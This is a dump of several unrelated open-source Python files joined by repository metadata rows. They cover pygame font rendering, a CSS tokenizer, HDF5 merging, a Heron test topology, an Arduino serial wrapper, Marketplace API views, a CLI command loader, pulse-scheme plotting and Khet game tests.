# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
'''
Created on 20/03/2014
@author: Alejandro Aguilera Martínez
@email: [email protected]
Module to render fonts with different effects.
See FontRenderer for help.
'''
from itertools import product
from math import ceil
import pygame as pg
from pygame.font import Font
from pygame import Surface
from pygame.transform import laplacian
#TODO: Transparent things aren't handled properly!
# Choosing the same color as the transparent color
# used internally will do very ugly stuff
class FontRenderer(object):
'''
Object to render text of any size.
    Rendering text is done through layers. Layers are passed to
    render() as a list. You can render as many layers as you want.
    Here is an example with all the layer types:
layers = [
('external_border',{'width':2, 'color':VIOLET}),
('shadows',{'positions_and_colors':[((2,-2),GREEN),((1,-1),RED)]}),
('normal',{'color':WHITE}),#
('internal_border', {'color':(GREEN)}),
('textured',{'image':image_texture})
]
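    A minimal call putting the pieces together (an illustrative sketch; the
    colour constants and texture above are assumed to be defined by the caller):
    renderer = FontRenderer('myfont.ttf')
    image = renderer.render('some text', 24, (0, 0, 0), True, layers)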
'''
TRANSPARENT = (255, 0, 255)
def __init__(self, font_file, antialias=False):
'''
Constructor
'''
if font_file:
self.font_file = font_file
else:
self.font_file = pg.font.get_default_font()
self._font_sizes = {}
self.antialias = antialias
# Parameters to create images
self.DISPLAY_BITDEPTH = pg.display.get_surface().get_bitsize()
self.IMG_FLAGS = pg.HWSURFACE
def _add_fontsize(self, filename, size):
""" Add a font size renderer to _font_sizes. """
self._font_sizes[size] = Font(filename, size)
def __getitem__(self, size):
""" Return the proper font size. """
try:
return self._font_sizes[size]
except KeyError:
self._add_fontsize(self.font_file, size)
return self._font_sizes[size]
def _get_new_surface(self, text, pixel_size):
""" Return a surface with the needed size for the text."""
img = Surface(pixel_size, self.IMG_FLAGS)
img.fill(self.TRANSPARENT)
img.set_colorkey(self.TRANSPARENT)
return img
def size(self, text, size, layers = []):
""" Return the image size in pixels.
This take into account all the layer given
and calculate the correct image size.
"""
x, y = self[size].size(text)
for layer in layers:
if layer[0] == 'shadows':
mx = my = 0
for t in layer[1]['positions_and_colors']:
mx = max(abs(t[0][0]), mx)
my = max(abs(t[0][1]), my)
x += mx*2
y += my*2
elif layer[0] == 'external_border':
width = layer[1]['width']
x += width*2
y += width*2
return (x,y)
def _render_internal(self, text, size, color, bg_color):
"""
Wrapper
"""
# For fastest blitting set hwsurface and the same
# bit depth as the display surface.
        # Also, for your own sanity, remember that rendering fonts gives
        # an 8-bit image and this can sometimes give unexpected results
        # when blitting onto a 32-bit surface.
img = self[size].render(text, self.antialias, color, bg_color)
return img.convert(self.DISPLAY_BITDEPTH, self.IMG_FLAGS)
def render(self, text, size, bg_color, bg_transparent, layers):
""" Render text through the defined layers. """
pixel_size = self.size(text, size, layers)
wo_effects_ps = self[size].size(text)
offset = ((pixel_size[0] - wo_effects_ps[0]) / 2,
(pixel_size[1] - wo_effects_ps[1]) / 2)
result = self._get_new_surface(text, pixel_size)
result.fill(bg_color)
if bg_transparent:
result.set_colorkey(bg_color)
# Create all the images and blit them together
images = [getattr(self, '_' + fun)(text, size, pixel_size, offset, **args) for fun, args in layers]
[result.blit(image, (0,0)) for image in images]
return result
def _fill_image(self, dest, filler, blendmode = 0):
""" Fills dest surface with filler repeating if necesary. """
ds = dest.get_size()
fs = filler.get_size()
for x in xrange(int(ceil(ds[0]/float(fs[0])))):
for y in xrange(int(ceil(ds[1]/float(fs[1])))):
dest.blit(filler, (x*fs[0],y*fs[1]), None, blendmode)
print x,y
"""
Layers
"""
def _textured(self, text, size, pixel_size, offset, image = None):
""" Render a textured font.
Transparent colors in the texture will be ignored.
"""
BG = (0,0,0)
FG = (255,255,255)
blendmode = pg.BLEND_MULT
temp = self._get_new_surface(text, pixel_size)
temp.fill(BG)
temp.blit(self._render_internal(text, size, FG, BG), offset)
self._fill_image(temp, image, blendmode)
return temp
def _normal(self, text, size, pixel_size, offset, color = None):
""" Return a normal render of the text. """
s = self._get_new_surface(text, pixel_size)
img = self._render_internal(text, size, color, self.TRANSPARENT)
img.set_colorkey(self.TRANSPARENT)
s.blit(img, offset)
return s
def _shadows(self, text, size, pixel_size, offset, positions_and_colors):
""" Add 'shadows' with different colors. """
wo_effects_ps = self[size].size(text)
offset = ((pixel_size[0] - wo_effects_ps[0]) / 2,
(pixel_size[1] - wo_effects_ps[1]) / 2)
f = self._render_internal
s = self._get_new_surface(text, pixel_size)
transparent = self.TRANSPARENT
for pos,color in positions_and_colors:
shadow = f(text, size, color, transparent)
shadow.set_colorkey(transparent)
n_pos = (pos[0]+offset[0], pos[1]+offset[1])
s.blit(shadow, n_pos)
return s
def _external_border(self, text, size, pixel_size, offset, width = None, color = None):
""" Add an external border (outside of the font). """
wo_effects_ps = self[size].size(text)
offset = ((pixel_size[0] - wo_effects_ps[0]) / 2,
(pixel_size[1] - wo_effects_ps[1]) / 2)
l = []
for x, y in product(xrange(-width, width+1, 1),xrange(-width, width+1, 1)):
l.append( ((x,y),color) )
return self._shadows(text, size, pixel_size, offset, l)
def _internal_border(self, text, size, pixel_size, offset, color = None):
""" Add an internal border (inside of the font). """
# Use very different colors to get a very sharp edge
BG = (0,0,0)
FG = (255,255,255)
temp = self._get_new_surface(text, pixel_size)
temp.fill(BG)
temp.blit(self._render_internal(text, size, FG, BG), offset)
temp = laplacian(temp)
temp.set_colorkey(FG)
result = self._get_new_surface(text, pixel_size)
result.fill(color)
result.blit(temp, (0,0))
result.set_colorkey(BG)
return result
| gpl-3.0 | -3,237,735,693,081,282,000 | 32.137652 | 107 | 0.5719 | false | 3.688598 | false | false | false |
kgn/cssutils | src/cssutils/tokenize2.py | 1 | 9735 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""New CSS Tokenizer (a generator)
"""
__all__ = ['Tokenizer', 'CSSProductions']
__docformat__ = 'restructuredtext'
__version__ = '$Id$'
from cssproductions import *
from helper import normalize
import itertools
import re
_TOKENIZER_CACHE = {}
class Tokenizer(object):
"""
generates a list of Token tuples:
(Tokenname, value, startline, startcolumn)
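    A sketch of typical use (illustrative only):
        t = Tokenizer()
        for name, value, line, col in t.tokenize(u'a { color: red }'):
            ...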
"""
_atkeywords = {
u'@font-face': CSSProductions.FONT_FACE_SYM,
u'@import': CSSProductions.IMPORT_SYM,
u'@media': CSSProductions.MEDIA_SYM,
u'@namespace': CSSProductions.NAMESPACE_SYM,
u'@page': CSSProductions.PAGE_SYM,
u'@variables': CSSProductions.VARIABLES_SYM
}
_linesep = u'\n'
unicodesub = re.compile(r'\\[0-9a-fA-F]{1,6}(?:\r\n|[\t|\r|\n|\f|\x20])?').sub
cleanstring = re.compile(r'\\((\r\n)|[\n|\r|\f])').sub
def __init__(self, macros=None, productions=None, doComments=True):
"""
inits tokenizer with given macros and productions which default to
cssutils own macros and productions
"""
if type(macros)==type({}):
macros_hash_key = sorted(macros.items())
else:
macros_hash_key = macros
hash_key = str((macros_hash_key, productions))
if hash_key in _TOKENIZER_CACHE:
(tokenmatches, commentmatcher, urimatcher) = _TOKENIZER_CACHE[hash_key]
else:
if not macros:
macros = MACROS
if not productions:
productions = PRODUCTIONS
tokenmatches = self._compile_productions(self._expand_macros(macros,
productions))
commentmatcher = [x[1] for x in tokenmatches if x[0] == 'COMMENT'][0]
urimatcher = [x[1] for x in tokenmatches if x[0] == 'URI'][0]
_TOKENIZER_CACHE[hash_key] = (tokenmatches, commentmatcher, urimatcher)
self.tokenmatches = tokenmatches
self.commentmatcher = commentmatcher
self.urimatcher = urimatcher
self._doComments = doComments
self._pushed = []
def _expand_macros(self, macros, productions):
"""returns macro expanded productions, order of productions is kept"""
def macro_value(m):
return '(?:%s)' % macros[m.groupdict()['macro']]
expanded = []
for key, value in productions:
while re.search(r'{[a-zA-Z][a-zA-Z0-9-]*}', value):
value = re.sub(r'{(?P<macro>[a-zA-Z][a-zA-Z0-9-]*)}',
macro_value, value)
expanded.append((key, value))
return expanded
def _compile_productions(self, expanded_productions):
"""compile productions into callable match objects, order is kept"""
compiled = []
for key, value in expanded_productions:
compiled.append((key, re.compile('^(?:%s)' % value, re.U).match))
return compiled
def push(self, *tokens):
"""Push back tokens which have been pulled but not processed."""
self._pushed = itertools.chain(tokens, self._pushed)
def clear(self):
self._pushed = []
def tokenize(self, text, fullsheet=False):
"""Generator: Tokenize text and yield tokens, each token is a tuple
of::
(name, value, line, col)
The token value will contain a normal string, meaning CSS unicode
escapes have been resolved to normal characters. The serializer
escapes needed characters back to unicode escapes depending on
the stylesheet target encoding.
text
to be tokenized
fullsheet
if ``True`` appends EOF token as last one and completes incomplete
COMMENT or INVALID (to STRING) tokens
"""
def _repl(m):
"used by unicodesub"
num = int(m.group(0)[1:], 16)
if num < 0x10000:
return unichr(num)
else:
return m.group(0)
def _normalize(value):
"normalize and do unicodesub"
return normalize(self.unicodesub(_repl, value))
line = col = 1
# check for BOM first as it should only be max one at the start
(BOM, matcher), productions = self.tokenmatches[0], self.tokenmatches[1:]
match = matcher(text)
if match:
found = match.group(0)
yield (BOM, found, line, col)
text = text[len(found):]
# check for @charset which is valid only at start of CSS
if text.startswith('@charset '):
found = '@charset ' # production has trailing S!
yield (CSSProductions.CHARSET_SYM, found, line, col)
text = text[len(found):]
col += len(found)
while text:
# do pushed tokens before new ones
for pushed in self._pushed:
yield pushed
# speed test for most used CHARs, sadly . not possible :(
c = text[0]
if c in u',:;{}>+[]':
yield ('CHAR', c, line, col)
col += 1
text = text[1:]
else:
# check all other productions, at least CHAR must match
for name, matcher in productions:
# TODO: USE bad comment?
if fullsheet and name == 'CHAR' and text.startswith(u'/*'):
# before CHAR production test for incomplete comment
possiblecomment = u'%s*/' % text
match = self.commentmatcher(possiblecomment)
if match and self._doComments:
yield ('COMMENT', possiblecomment, line, col)
text = None # ate all remaining text
break
match = matcher(text) # if no match try next production
if match:
found = match.group(0) # needed later for line/col
if fullsheet:
# check if found may be completed into a full token
if 'INVALID' == name and text == found:
# complete INVALID to STRING with start char " or '
name, found = 'STRING', '%s%s' % (found, found[0])
elif 'FUNCTION' == name and\
u'url(' == _normalize(found):
# url( is a FUNCTION if incomplete sheet
# FUNCTION production MUST BE after URI production
for end in (u"')", u'")', u')'):
possibleuri = '%s%s' % (text, end)
match = self.urimatcher(possibleuri)
if match:
name, found = 'URI', match.group(0)
break
if name in ('DIMENSION', 'IDENT', 'STRING', 'URI',
'HASH', 'COMMENT', 'FUNCTION', 'INVALID',
'UNICODE-RANGE'):
# may contain unicode escape, replace with normal
# char but do not _normalize (?)
value = self.unicodesub(_repl, found)
if name in ('STRING', 'INVALID'): #'URI'?
# remove \ followed by nl (so escaped) from string
value = self.cleanstring('', found)
else:
if 'ATKEYWORD' == name:
try:
# get actual ATKEYWORD SYM
name = self._atkeywords[_normalize(found)]
except KeyError, e:
# might also be misplace @charset...
if '@charset' == found and u' ' == text[len(found):len(found)+1]:
# @charset needs tailing S!
name = CSSProductions.CHARSET_SYM
found += u' '
else:
name = 'ATKEYWORD'
value = found # should not contain unicode escape (?)
if self._doComments or (not self._doComments and
name != 'COMMENT'):
yield (name, value, line, col)
text = text[len(found):]
nls = found.count(self._linesep)
line += nls
if nls:
col = len(found[found.rfind(self._linesep):])
else:
col += len(found)
break
if fullsheet:
yield ('EOF', u'', line, col)
| gpl-3.0 | -3,785,011,545,157,365,000 | 41.851351 | 101 | 0.451567 | false | 4.901813 | false | false | false |
startcode/apollo | modules/tools/prediction/mlp_train/merge_h5.py | 1 | 2643 | #!/usr/bin/env python
###############################################################################
# Copyright 2018 The Apollo Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###############################################################################
import os
import glob
import argparse
import datetime
import numpy as np
import h5py
def load_hdf5(filename):
"""
load training samples from *.hdf5 file
"""
if not(os.path.exists(filename)):
print "file:", filename, "does not exist"
os._exit(1)
if os.path.splitext(filename)[1] != '.h5':
print "file:", filename, "is not an hdf5 file"
os._exit(1)
h5_file = h5py.File(filename, 'r')
values = h5_file.values()[0]
print "load data size:", values.shape[0]
return values
if __name__ == '__main__':
parser = argparse.ArgumentParser(description = 'generate training samples\
from a specified directory')
parser.add_argument('directory', type=str,
help='directory contains feature files in .h5')
args = parser.parse_args()
path = args.directory
print "load h5 from directory:", format(path)
if os.path.isdir(path):
features = None
labels = None
h5_files = glob.glob(path + '/*.h5')
print "Length of files:", len(h5_files)
for i, h5_file in enumerate(h5_files):
print "Process File", i, ":", h5_file
feature = load_hdf5(h5_file)
if np.any(np.isinf(feature)):
print "inf data found"
features = np.concatenate((features, feature), axis=0) if features is not None \
else feature
else:
print "Fail to find", path
os._exit(-1)
date = datetime.datetime.now().strftime('%Y-%m-%d')
sample_dir = path + '/mlp_merge'
if not os.path.exists(sample_dir):
os.makedirs(sample_dir)
sample_file = sample_dir + '/mlp_' + date + '.h5'
print "Save samples file to:", sample_file
h5_file = h5py.File(sample_file, 'w')
h5_file.create_dataset('data', data=features)
h5_file.close()
| apache-2.0 | -8,108,443,370,418,419,000 | 32.455696 | 92 | 0.595157 | false | 3.875367 | false | false | false |
twitter/heron | integration_test/src/python/integration_test/topology/one_spout_multi_tasks/one_spout_multi_tasks.py | 2 | 1572 | #!/usr/bin/env python3
# -*- encoding: utf-8 -*-
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=missing-docstring
from heronpy.api.stream import Grouping
from integration_test.src.python.integration_test.core import TestTopologyBuilder
from integration_test.src.python.integration_test.common.bolt import IdentityBolt
from integration_test.src.python.integration_test.common.spout import ABSpout
def one_spout_multi_tasks_builder(topology_name, http_server_url):
builder = TestTopologyBuilder(topology_name, http_server_url)
ab_spout = builder.add_spout("ab-spout", ABSpout, 3)
builder.add_bolt("identity-bolt", IdentityBolt,
inputs={ab_spout: Grouping.SHUFFLE},
par=1,
optional_outputs=['word'])
return builder.create_topology()
| apache-2.0 | 4,743,227,587,584,489,000 | 40.368421 | 81 | 0.741094 | false | 3.787952 | true | false | false |
webbhorn/Arduino-Switch-Controller | arduino/arduino.py | 1 | 2214 | #!/usr/bin/env python
import serial, time
class Arduino(object):
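    """
    Thin wrapper around a pyserial connection to an Arduino board.
    Illustrative use (the port name is an assumption; adjust for your system):
        board = Arduino('/dev/ttyUSB0')
        board.output([13])
        board.setHigh(13)
    """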
__OUTPUT_PINS = -1
def __init__(self, port, baudrate=9600):
self.serial = serial.Serial(port, baudrate)
def __str__(self):
return "Arduino is on port %s at %d baudrate" %(self.serial.port, self.serial.baudrate)
def output(self, pinArray):
self.__sendData(len(pinArray))
if(isinstance(pinArray, list) or isinstance(pinArray, tuple)):
self.__OUTPUT_PINS = pinArray
for each_pin in pinArray:
self.__sendPin(each_pin)
return True
def setLow(self, pin):
self.__sendData('0')
self.__sendPin(pin)
return True
def setHigh(self, pin):
self.__sendData('1')
self.__sendPin(pin)
return True
def getState(self, pin):
self.__sendData('2')
self.__sendPin(pin)
return self.__formatPinState(self.__getData())
def analogWrite(self, pin, value):
self.__sendData('3')
hex_value = hex(value)[2:]
if(len(hex_value)==1):
self.__sendData('0')
else:
self.__sendData(hex_value[0])
self.__sendData(hex_value[1])
return True
def analogRead(self, pin):
self.__sendData('4')
self.__sendPin(pin)
return self.__getData()
def turnOff(self):
for each_pin in self.__OUTPUT_PINS:
self.setLow(each_pin)
return True
def __sendPin(self, pin):
pin_in_char = chr(pin+48)
self.__sendData(pin_in_char)
def __sendData(self, serial_data):
while(self.__getData()!="what"):
pass
self.serial.write(str(serial_data))
def __getData(self):
return self.serial.readline().replace("\r\n","")
def __formatPinState(self, pinValue):
if pinValue=='1':
return True
else:
return False
def close(self):
self.serial.close()
return True
"""
def __del__(self):
#close serial connection once program ends
#this fixes the problem of port getting locked or unrecoverable in some linux systems
self.serial.close()
"""
| mit | 4,657,381,806,307,410,000 | 24.744186 | 95 | 0.555104 | false | 3.771721 | false | false | false |
clouserw/zamboni | mkt/websites/views.py | 1 | 1959 | from django.db.transaction import non_atomic_requests
from rest_framework.generics import ListAPIView
from rest_framework.permissions import AllowAny
from mkt.api.authentication import (RestOAuthAuthentication,
RestSharedSecretAuthentication)
from mkt.api.base import CORSMixin, MarketplaceView
from mkt.api.paginator import ESPaginator
from mkt.search.filters import (PublicSearchFormFilter, RegionFilter,
SearchQueryFilter)
from mkt.search.forms import SimpleSearchForm
from mkt.websites.indexers import WebsiteIndexer
from mkt.websites.models import Website
from mkt.websites.serializers import ESWebsiteSerializer, WebsiteSerializer
class WebsiteView(CORSMixin, MarketplaceView, ListAPIView):
cors_allowed_methods = ['get']
authentication_classes = [RestSharedSecretAuthentication,
RestOAuthAuthentication]
permission_classes = [AllowAny]
serializer_class = WebsiteSerializer
model = Website
class WebsiteSearchView(CORSMixin, MarketplaceView, ListAPIView):
"""
Base website search view based on a single-string query.
"""
cors_allowed_methods = ['get']
authentication_classes = [RestSharedSecretAuthentication,
RestOAuthAuthentication]
permission_classes = [AllowAny]
filter_backends = [PublicSearchFormFilter, RegionFilter, SearchQueryFilter]
serializer_class = ESWebsiteSerializer
paginator_class = ESPaginator
form_class = SimpleSearchForm
def get_queryset(self):
return WebsiteIndexer.search()
@classmethod
def as_view(cls, **kwargs):
# Make all search views non_atomic: they should not need the db, or
# at least they should not need to make db writes, so they don't need
# to be wrapped in transactions.
view = super(WebsiteSearchView, cls).as_view(**kwargs)
return non_atomic_requests(view)
| bsd-3-clause | -3,533,117,552,146,456,000 | 38.979592 | 79 | 0.720265 | false | 4.462415 | false | false | false |
rizumu/bootmachine | bootmachine/management/__init__.py | 1 | 3322 | # (c) 2008-2011 James Tauber and contributors; written for Pinax (http://pinaxproject.com)
# Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
import os
import sys
import bootmachine
BOOTMACHINE_COMMAND_DIR = os.path.join(
os.path.dirname(bootmachine.__file__), "management", "commands"
)
class CommandNotFound(Exception):
pass
class CommandLoader(object):
def __init__(self):
self.command_dir = BOOTMACHINE_COMMAND_DIR
self.commands = {}
self._load_commands()
def _load_commands(self):
for f in os.listdir(self.command_dir):
if not f.startswith("_") and f.endswith(".py"):
name = f[:-3]
mod = "bootmachine.management.commands.%s" % name
try:
__import__(mod)
except:
self.commands[name] = sys.exc_info()
else:
mod = sys.modules[mod]
self.commands[name] = mod.Command()
def load(self, name):
try:
command = self.commands[name]
except KeyError:
raise CommandNotFound("Unable to find command '%s'" % name)
else:
if isinstance(command, tuple):
# an exception occurred when importing the command so let's
# re-raise it here
                raise command[1]
return command
class CommandRunner(object):
usage = "bootmachine-admin command [options] [args]"
def __init__(self, argv=None):
self.argv = argv or sys.argv[:]
self.loader = CommandLoader()
self.loader.commands["help"] = self.help()
def help(self):
loader, usage = self.loader, self.usage
# use BaseCommand for --version
from bootmachine.management.base import BaseCommand
class HelpCommand(BaseCommand):
def handle(self, *args, **options):
print("Usage: {}\n".format(usage))
print("Options:"
" --version show program's version number and exit\n"
" -h, --help show this help message and exit\n"
"Available commands:\n")
for command in loader.commands.keys():
print(" {}".format(command))
return HelpCommand()
def execute(self):
argv = self.argv[:]
try:
command = self.argv[1]
except IndexError:
# display help if no arguments were given.
command = "help"
argv.extend(["help"])
# special cases for bootmachine-admin itself
if command in ["-h", "--help"]:
argv.pop()
command = "help"
argv.extend(["help"])
if command == "--version":
argv.pop()
command = "help"
argv.extend(["help", "--version"])
# load command and run it!
try:
self.loader.load(command).run_from_argv(argv)
except CommandNotFound as e:
sys.stderr.write("{}\n".format(e.args[0]))
sys.exit(1)
def execute_from_command_line():
"""
A simple method that runs a ManagementUtility.
"""
runner = CommandRunner()
runner.execute()
| mit | -1,116,202,746,595,356,300 | 30.339623 | 90 | 0.54124 | false | 4.353866 | false | false | false |
DiCarloLab-Delft/PycQED_py3 | pycqed/utilities/pulse_scheme.py | 1 | 5469 | import numpy as np
import matplotlib.pyplot as plt
import matplotlib.patches
def new_pulse_fig(figsize):
'''
Open a new figure and configure it to plot pulse schemes.
'''
fig, ax = plt.subplots(1, 1, figsize=figsize, frameon=False)
ax.axis('off')
fig.subplots_adjust(bottom=0, top=1, left=0, right=1)
ax.axhline(0, color='0.75')
return fig, ax
def new_pulse_subplot(fig, *args, **kwargs):
'''
Add a new subplot configured for plotting pulse schemes to a figure.
All *args and **kwargs are passed to fig.add_subplot.
'''
ax = fig.add_subplot(*args, **kwargs)
ax.axis('off')
fig.subplots_adjust(bottom=0, top=1, left=0, right=1)
ax.axhline(0, color='0.75')
return ax
def mwPulse(ax, pos, y_offs=0, width=1.5, amp=1, label=None, phase=0, labelHeight=1.3,
color='C0', modulation='normal', **plot_kws):
'''
Draw a microwave pulse: Gaussian envelope with modulation.
'''
x = np.linspace(pos, pos + width, 100)
envPos = amp * np.exp(-(x - (pos + width / 2))**2 / (width / 4)**2)
envNeg = -amp * np.exp(-(x - (pos + width / 2))**2 / (width / 4)**2)
if modulation == 'normal':
mod = envPos * np.sin(2 * np.pi * 3 / width * x + phase)
elif modulation == 'high':
mod = envPos * np.sin(5 * np.pi * 3 / width * x + phase)
else:
raise ValueError()
ax.plot(x, envPos+y_offs, '--', color=color, **plot_kws)
ax.plot(x, envNeg+y_offs, '--', color=color, **plot_kws)
ax.plot(x, mod+y_offs, '-', color=color, **plot_kws)
if label is not None:
ax.text(pos + width / 2, labelHeight, label,
horizontalalignment='right', color=color)
return pos + width
def fluxPulse(ax, pos, y_offs=0, width=2.5, s=.1, amp=1.5, label=None, labelHeight=1.7,
color='C1', **plot_kws):
'''
Draw a smooth flux pulse, where the rising and falling edges are given by
Fermi-Dirac functions.
s: smoothness of edge
'''
x = np.linspace(pos, pos + width, 100)
y = amp / ((np.exp(-(x - (pos + 5.5 * s)) / s) + 1) *
(np.exp((x - (pos + width - 5.5 * s)) / s) + 1))
ax.fill_between(x, y+y_offs, color=color, alpha=0.3)
ax.plot(x, y+y_offs, color=color, **plot_kws)
if label is not None:
ax.text(pos + width / 2, labelHeight, label,
horizontalalignment='center', color=color)
return pos + width
def ramZPulse(ax, pos, y_offs=0, width=2.5, s=0.1, amp=1.5, sep=1.5, color='C1'):
'''
Draw a Ram-Z flux pulse, i.e. only part of the pulse is shaded, to indicate
cutting off the pulse at some time.
'''
xLeft = np.linspace(pos, pos + sep, 100)
xRight = np.linspace(pos + sep, pos + width, 100)
xFull = np.concatenate((xLeft, xRight))
y = amp / ((np.exp(-(xFull - (pos + 5.5 * s)) / s) + 1) *
(np.exp((xFull - (pos + width - 5.5 * s)) / s) + 1))
yLeft = y[:len(xLeft)]
ax.fill_between(xLeft, yLeft+y_offs, alpha=0.3, color=color, linewidth=0.0)
ax.plot(xFull, y+y_offs, color=color)
return pos + width
def modZPulse(ax, pos, y_offs=0, width=2.5, s=0.1, amp=1.5, sep=1.5, color='C1'):
'''
Draw a modulated Z pulse.
'''
return pos + width
def interval(ax, start, stop, y_offs = 0, height=1.5, label=None, labelHeight=None,
vlines=True, color='k', arrowstyle='<|-|>', **plot_kws):
'''
Draw an arrow to indicate an interval.
'''
if labelHeight is None:
labelHeight = height + 0.2
arrow = matplotlib.patches.FancyArrowPatch(
posA=(start, height+y_offs), posB=(stop, height+y_offs), arrowstyle=arrowstyle,
color=color, mutation_scale=7, **plot_kws)
ax.add_patch(arrow)
if vlines:
ax.plot([start, start], [0+y_offs, height+y_offs], '--', color=color, **plot_kws)
ax.plot([stop, stop], [0+y_offs, height+y_offs], '--', color=color, **plot_kws)
if label is not None:
ax.text((start + stop) / 2, labelHeight+y_offs, label, color=color,
horizontalalignment='center')
def interval_vertical(ax, start, stop, position, label=None, labelHeight=None,
color='k', arrowstyle='<|-|>', labeloffset: float = 0,
horizontalalignment='center'):
'''
Draw an arrow to indicate an interval.
'''
if labelHeight is None:
labelHeight = (start+stop)/2
arrow = matplotlib.patches.FancyArrowPatch(
posA=(position, start), posB=(position, stop), arrowstyle=arrowstyle,
color=color, mutation_scale=7)
ax.add_patch(arrow)
if label is not None:
ax.text(position+labeloffset, labelHeight, label, color=color,
horizontalalignment=horizontalalignment)
def meter(ax, x0, y0, y_offs=0, w=1.1, h=.8, color='black', fillcolor=None):
"""
Draws a measurement meter on the specified position.
"""
    if fillcolor is None:
fill = False
else:
fill = True
p1 = matplotlib.patches.Rectangle(
(x0-w/2, y0-h/2+y_offs), w, h, facecolor=fillcolor, edgecolor=color,
fill=fill, zorder=5)
ax.add_patch(p1)
p0 = matplotlib.patches.Wedge(
(x0, y0-h/4+y_offs), .4, theta1=40, theta2=180-40, color=color, lw=2,
width=.01, zorder=5)
ax.add_patch(p0)
ax.arrow(x0, y0-h/4+y_offs, dx=.5*np.cos(np.deg2rad(70)),
dy=.5*np.sin(np.deg2rad(60)), width=.03, color=color, zorder=5)
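# Illustrative composition of a pulse scheme using the helpers above
# (a sketch; figure size and labels are arbitrary):
# fig, ax = new_pulse_fig((7, 2))
# t = mwPulse(ax, 0, label='X90')
# t = fluxPulse(ax, t, label='CZ')
# interval(ax, 0, t, label='total time')
# meter(ax, t + 1, 0)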
| mit | -4,925,029,477,719,938,000 | 32.552147 | 89 | 0.585848 | false | 2.957815 | false | false | false |
TheWiseLion/pykhet | tests/game_tests.py | 1 | 5304 | import unittest
from pykhet.components.types import MoveType, Move, TeamColor, Orientation
from pykhet.components.types import Position
from pykhet.games.game_types import ClassicGame
class TestClassicGames(unittest.TestCase):
def setUp(self):
self.game = ClassicGame()
def tearDown(self):
self.game = None
def test_available_moves_classic(self):
sphinx_moves_silver = self.game.get(0, 0).get_moves(self.game)
sphinx_moves_red = self.game.get(9, 7).get_moves(self.game)
# Sphinx Only Has 1 Move
self.assertEquals(len(sphinx_moves_silver), 1)
self.assertEquals(len(sphinx_moves_silver), len(sphinx_moves_red))
pharaoh_moves_silver = self.game.get(5, 0).get_moves(self.game)
pharaoh_moves_red = self.game.get(4, 7).get_moves(self.game)
# three moves, zero rotations
self.assertEquals(len(pharaoh_moves_red), 3)
self.assertEquals(len(pharaoh_moves_red), len(pharaoh_moves_silver))
# Test Anubises
anubis_moves_silver = self.game.get(4, 0).get_moves(self.game)
anubis_moves_red = self.game.get(5, 7).get_moves(self.game)
# four move, two rotations
self.assertEquals(len(anubis_moves_red), 6)
self.assertEquals(len(anubis_moves_red), len(anubis_moves_silver))
anubis_moves_silver = self.game.get(6, 0).get_moves(self.game)
anubis_moves_red = self.game.get(3, 7).get_moves(self.game)
# three moves, two rotations
self.assertEquals(len(anubis_moves_red), 5)
self.assertEquals(len(anubis_moves_red), len(anubis_moves_silver))
# Test Scarabs
scarab1_moves_silver = self.game.get(4, 3).get_moves(self.game)
scarab1_moves_red = self.game.get(5, 4).get_moves(self.game)
# 4 moves, 1 swap, 2 rotations
self.assertEquals(len(scarab1_moves_silver), 7)
self.assertEquals(len(scarab1_moves_red), len(scarab1_moves_silver))
scarab2_moves_silver = self.game.get(5, 3).get_moves(self.game)
scarab2_moves_red = self.game.get(4, 4).get_moves(self.game)
# 5 moves, 2 rotations
self.assertEquals(len(scarab2_moves_silver), 7)
self.assertEquals(len(scarab2_moves_red), len(scarab2_moves_silver))
# Test Pyramids:
p1_silver = self.game.get(2, 1).get_moves(self.game)
p1_red = self.game.get(7, 6).get_moves(self.game)
# 6 moves, 2 rotations
self.assertEquals(len(p1_silver), 8)
self.assertEquals(len(p1_red), len(p1_silver))
p2_silver = self.game.get(6, 5).get_moves(self.game)
p2_red = self.game.get(3, 2).get_moves(self.game)
# 5 moves, 2 rotations
self.assertEquals(len(p2_red), 7)
self.assertEquals(len(p2_red), len(p2_silver))
p3_silver = self.game.get(0, 3).get_moves(self.game)
p3_red = self.game.get(9, 3).get_moves(self.game)
# 4 moves, 2 rotations
self.assertEquals(len(p3_red), 6)
self.assertEquals(len(p3_red), len(p3_silver))
p3_silver = self.game.get(0, 4).get_moves(self.game)
p3_red = self.game.get(9, 4).get_moves(self.game)
# 4 moves, 2 rotations
self.assertEquals(len(p3_red), 6)
self.assertEquals(len(p3_red), len(p3_silver))
p4_silver = self.game.get(2, 3).get_moves(self.game)
p4_red = self.game.get(7, 4).get_moves(self.game)
# 6 moves, 2 rotations
self.assertEquals(len(p4_red), 8)
self.assertEquals(len(p4_red), len(p4_silver))
p5_silver = self.game.get(7, 0).get_moves(self.game)
p5_red = self.game.get(2, 7).get_moves(self.game)
# 4 moves, 2 rotations
self.assertEquals(len(p5_silver), 6)
self.assertEquals(len(p5_red), len(p5_silver))
def test_destroy_pieces_classic(self):
self.game.apply_move(Move(MoveType.move, Position(2, 1), Position(2, 0)))
self.game.apply_laser(TeamColor.silver)
self.game.apply_move(Move(MoveType.move, Position(7, 6), Position(7, 7)))
self.game.apply_laser(TeamColor.red)
self.game.apply_move(Move(MoveType.rotate, Position(0, 0), Orientation.right))
self.game.apply_laser(TeamColor.silver)
self.assertEquals(len(self.game.squares_with_pieces_of_color(TeamColor.silver)),
len(self.game.squares_with_pieces_of_color(TeamColor.red)) + 1)
self.game.apply_move(Move(MoveType.rotate, Position(9, 7), Orientation.left))
self.game.apply_laser(TeamColor.red)
